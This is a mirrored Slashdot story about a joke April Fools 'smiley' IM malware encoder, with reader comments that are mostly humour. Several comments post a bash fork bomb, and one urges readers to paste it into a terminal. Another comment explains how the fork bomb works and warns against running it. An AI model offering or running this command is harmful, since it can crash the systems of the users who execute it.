Slashdot Mirror

← Back to Stories (view on slashdot.org)

Instant Messaging Vulnerable To New Smiley Attacks

Posted by timothy on from the clever-really dept.

titus writes "Security researchers Yoann Guillot and Julien Tinnes have found a way to encode malicious code into smileys and provided a proof of concept encoder to automate the process. The researchers said their discovery paves the way for IM malware that would be impossible to detect since the malicious code would be 'indistinguishable from genuine chat messages.' I've tested the proof of concept code which works very well. Time to panic?"

49 of 170 comments (clear)

  1. Virus Smiles!?! by Anonymous Coward · · Score: 4, Funny

    Uh-oh, I knew all those 14 year old girls were really 1337 ha>0rz...

    1. Re:Virus Smiles!?! by Leafheart · · Score: 5, Funny

      I thought that was the reason for all the "Download best smiles EVER for MSN" links I saw around.

      --
      --- "When you gotta do something wrong. You gotta do it right. (Fighter)"
    2. Re:Virus Smiles!?! by ShadowBlasko · · Score: 2, Funny

      There are no girls on instant messenger... You know that!

      --
      There are 4 boxes to use in the defense of liberty: soap, ballot, jury, ammo. Use in that order- Ed Howdershelt Via Tass
    3. Re:Virus Smiles!?! by Nukenbar · · Score: 2

      Were they sending this? :(){ :|:& };:

    4. Re:Virus Smiles!?! by sunami88 · · Score: 5, Funny

      Dad: Who hacked us!?

      Granny: idk my bff jill?

      I'll go kill myself now.

      --
      Sex. Drugs, and Unix.
    5. Re:Virus Smiles!?! by collinstocks · · Score: 3, Informative

      It is not wise to post such things... there are people who actually would paste that into a terminal despite your warning.

      The way it works is as follows: :(){ something } # this is a valid function declaration which does something
      program1|program2 # this runs both program1 and program2, and pipes the output of one to the other
      command& # this runs a command in the background (i.e. non-blocking)
      ; # this is a line break
      : # this is a valid function call

      So, it makes a recursive function which calls itself twice from within the body of the code. Since it calls itself non-blocking, there is no infinite recursion error. On the next line, it calls the function.

      So, each parent function call spawns two children, and each child spawns two children, et cetera. This can easily bring down a system that is not securely configured (that is, most systems).

  2. Take that! :-) by betterunixthanunix · · Score: 5, Funny

    And that! :-) (-:

    --
    Palm trees and 8
  3. :) and :-) by superpaladin · · Score: 2, Interesting

    which is safer?

    1. Re::) and :-) by VeNoM0619 · · Score: 2, Funny

      Not the ugly one, that's for sure, otherwise you find yourself handcuffed to a bed with a hangover.

      --
      Disclaimer: I am not god.
      We may not be created equal
      But we can be treated equal.
  4. In the spirit by tsstahl · · Score: 2, Insightful

    For the love of all that's decent, make it stop!

    Publishing these holes only encourages further malicious activity!

  5. Mom was right. by rackserverdeals · · Score: 4, Funny

    Smiles are contagious.

    --
    Dual Opteron < $600
    1. Re:Mom was right. by koterica · · Score: 2, Funny

      So is herpes. A coincidence? I think not.

  6. Re:Very.. by Brett+Buck · · Score: 4, Funny

    Yeah, opening for Kathy Griffin.

          April Fools Day is always a great opportunity to see that computer nerd humor is every bit as good as computer nerd social skills and personal hygiene.

            Brett

  7. Stop. Really, just stop by arkham6 · · Score: 4, Insightful

    Please? OK? One or two stories is acceptable, even if they are not funny. Multiple stories each year is just annoying.

    1. Re:Stop. Really, just stop by MobileTatsu-NJG · · Score: 5, Insightful

      Flamebait??? He's spot on. Mod him "goddamn right!"

      Slashdot is operational 364 days a year. One day of silliness and it's BITCHBITCHBITCHBITCHBITCH. Your problem's between the chair and the keyboard.

      --

      "I like to lick butts!" by MobileTatsu-NJG (#32700246) (Score:5, Informative)

    2. Re:Stop. Really, just stop by poena.dare · · Score: 4, Funny

      Your problem's between the chair and the keyboard.

      Nothing wrong with my penis. What you talkin about Willis?

    3. Re:Stop. Really, just stop by bitt3n · · Score: 3, Insightful

      the real amusement here is watching all the hissy fits these joke articles cause by momentarily interrupting weighty discussions on the legal implications of copyrighting a cloud pattern, or whether Steve Jobs should pop that zit on his chin.

      --
      how many pairs of boxer shorts should you own?
    4. Re:Stop. Really, just stop by blackfrancis75 · · Score: 5, Informative

      Slashdot is operational 364 days a year.

      actually 364.24222 days a year .. and you call yourself a nerd?

    5. Re:Stop. Really, just stop by Anonymous Coward · · Score: 2, Insightful

      Slashdot is operational 364 days a year. One day of silliness and it's BITCHBITCHBITCHBITCHBITCH.

      In other words, no different than the other 364 days.

  8. Virus Variant by JerryLove · · Score: 5, Funny

    As I understand it, there is already a variant out undetectable to anti-smiley software as it embeds itself in a frowny-face.

    I wonder if it's transmittable on a discussion board as well? :(

  9. My favorite holiday by Weaselmancer · · Score: 3, Insightful

    "Slashdot Is Broken Day!"

    Oh please, please someone post a release date for Duke Nukem Forever! Or a story about how Microsoft is publishing their source code base under the GPL.

    IT'S NOT TIRED AND BORING AT ALL.

    --
    Weaselmancer
    rediculous.
    1. Re:My favorite holiday by Dun+Malg · · Score: 2

      The only positive thing I can say about today is that it's better than it was a a year or two ago, when every fucking story was a joke, and not a single one of them was even the slightest bit clever or believable. This one story at least has the obfuscation of assembly language to make it look plausible, and we have a real blurb about conficker, so we're already ahead.

      --
      If a job's not worth doing, it's not worth doing right.
  10. Re:Take that! :-) by Jason+Levine · · Score: 5, Funny

    Ack! Now I'm :-) infected. How could :-) you go posting :-) such a virulent :-) virus where :-) everyone could see i:-)t? I thin:-)k th:-)e inf:-)ect:-)ion's g:-)et:-)tin:-)g wo:-)rs:-)e n:-)o:-)w. I:-)'m of:-)f t:-)o pa:-)t:-)ch:-) m:-)y s:-)ys:-)te:-)m. :-):-):-):-):-)

    --
    My sci-fi novel, Ghost Thief, is now available from Amazon.com.
  11. More fun with smilies... by 6Yankee · · Score: 4, Funny

    I've always thought that it would be far more fun to get into someone's system (actually, lots of people's systems) and replace the smiley images. You send :) and, instead of getting a smiley face, they see an image that contains a sexually explicit proposition in the default MSN font. Imagine the chaos.

    Fortunately for the world, I can't write viruses. :D

    1. Re:More fun with smilies... by EkriirkE · · Score: 3, Funny

      :O -> goatse.jpg
      :O~ -> tubgirl.jpg
      :x -> lemonparty.jpg
      :S -> meatspin.gif

      --
      from 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
      to 45 2F 6E 40 3C DF 10 71 4E 41 DF AA 25 7D 31 3F
  12. :(){ :|:& };: anyone? by TinBromide · · Score: 5, Informative

    :(){ :|:& };:

    There, punch that into your terminal and see the poweer of the smiley.

    --
    Is it sad that I am more likely to recognize you and your posts by your sig than your name or UID?
  13. This is the one to watch out for by thetoadwarrior · · Score: 3, Funny

    8===D

    It always leads to trouble.

    1. Re:This is the one to watch out for by Friday · · Score: 2, Funny

      I more concerned with this one:

      8===D (!)

      Stay away from my @ss!!

      Or it'll end up looking like this.. =(*)=

      -- Never thought I get the use the goatse emoticon in a real posting ;)

  14. Bugtraq by just_another_sean · · Score: 3, Insightful

    I received this in a bugtraq message earlier and just ignored it, thinking huh, I should read that later. Having read it here I went back and checked it out in full. Did anyone actually run the Ruby code attached to the blog/bugtraq?

    --
    Creationist Textbook Stickers Declared Unconstitutional by CowboyNeal
  15. The problem with /. April fool's... by PinkyDead · · Score: 5, Insightful

    ...is that some of the real stories are less plausible.

    --
    Genesis 1:32 And God typed :wq!
  16. Re:Very.. by Anonymous Coward · · Score: 3, Funny

    "computer nerd... every bit"

    har har

  17. So? by CopaceticOpus · · Score: 2, Interesting

    That's nothing, I can insert malicious code into the space between those smileys.

  18. obligatory xkcd by WhiteDragon · · Score: 4, Funny

    http://xkcd.com/380/

    --
    Did you mount a military-grade, variable-focus MASER on an unlicensed artificial intelligence?
    1. Re:obligatory xkcd by Kozz · · Score: 2, Informative

      It's a basilisk.

      --
      I only post comments when someone on the internet is wrong.
  19. STOP PRESS! Slashcode is also vulnerable! by daybot · · Score: 2, Funny

    :O

  20. Warning! by digitac · · Score: 3, Funny

    Slashdot vulnerable to lame April Fools' jokes! Cease using immediately for at least 24 hours.

    This message brought to you by the Association of Simpleminded Slashdot Humor Adversion Team

  21. Did anyone actually run the code? by fader · · Score: 2, Interesting

    I'm paranoid, as my idea of a good AFJ would be publishing genuinely malicious code as joke malicious code.

    --
    - fader
  22. You know... by WarpCode · · Score: 3, Funny

    Regardless of it being a harmless April fools joke, Symantec is probably all ready working on a "Smiley Face Blocker".... And people will buy it...

    1. Re:You know... by K.+S.+Kyosuke · · Score: 2, Funny

      And then they will repackage it as Emoticon Exterminator Enterprise Edition...and corporations will buy it...

      --
      Ezekiel 23:20
  23. Re:Awesome by GMFTatsujin · · Score: 5, Funny

    ^_^

  24. Bobby McFerrin says: by FelixNZ · · Score: 3, Funny

    Don't worry about your data, be :)

  25. I can just imagine... by soapdog · · Score: 2

    You go typing: "I 3 you" and norton pops up... the horror, the horror...

    --
    -- Por mais que eu ande no vale das trevas e da morte, meu PowerMac G4 Não Travará!!!
  26. Re:Take that! :-) by shadowbearer · · Score: 2

    *grin*

    --
    It's old. The more humans I meet, the more I like my cats. At least they are honest.
  27. Re:Take that! :-) by lahvak · · Score: 2, Funny

    You can use a good programming editor when posting, something with syntax highlighting and parensbcwsmilies matching to keep your smilies properly balanced.

    I guess the way the infection works is you put so many smilies to make the message look like some sort of lisp code. The IM software gets confused, starts a lisp interpreter to make some sense of it, the unbalanced parenthesis cause a buffer overflow in the parser, ...

    --
    AccountKiller
  28. While this may well be a joke... by Wiseleo · · Score: 4, Informative

    ...in reality there are 3rd party smiley add-ons that work with IM software. You can recognize them by the "Your buddy sent you a smiley, to see it you need to install X software" type of IMs.

    That software is not exactly good for your computer either.

    For example: http://emoticons.smileycentral.com/yahoo-smileys.jsp

    And its EULA http://helpint.mywebsearch.com/intlinfo/eula/eula.jhtml

    Choice quotes from EULA

    UNIFIED REGISTRATION: As a service to our users, we may consolidate registration data for Webfetti, My Fun Cards, Kazulah, Smiley Central and certain other specified websites, services or applications accessible via the Toolbar, so that users are only required to provide registration information once, and would then be able to use the same unique ID and password to access all such websites, services or applications.

    Passwords. In order to access certain services, you may be required to accept additional terms and conditions and/or establish an account including an unique ID and password

    After reading that EULA, which references a bunch of other EULAs... that's enough to send my head spinning.

    --
    Leonid S. Knyshov
    Find me on Quora :)
  29. This is real you guys by wiedzmin · · Score: 2, Funny

    This is not a hoax, this is real you guys... I'm cereal!

    --
    Bow before me, for I am root.
  30. Dammit by nog_lorp · · Score: 2, Insightful

    I stared at the PoC and the outputs wondering how the fuck they thought this was supposed to actually be run by the target, before remembering what day it was.

  31. Re:crap anyone? by Anonymous Coward · · Score: 2, Funny

    that wasn't fun at all. I had to restart my computer. I specifically got ubuntu windows instead of microsoft because of this kind of crap!

  32. Re:Geek License Revocation. by fractoid · · Score: 2, Insightful

    Fork bomb? I thought it was a smiley threesome.

    Then all of the participants had lots of kids. Lots and lots and lots of kids.

    --
    Rampant carbon sequestration destroyed the Dinosaurs' tropical paradise. I'm here to help repair the damage.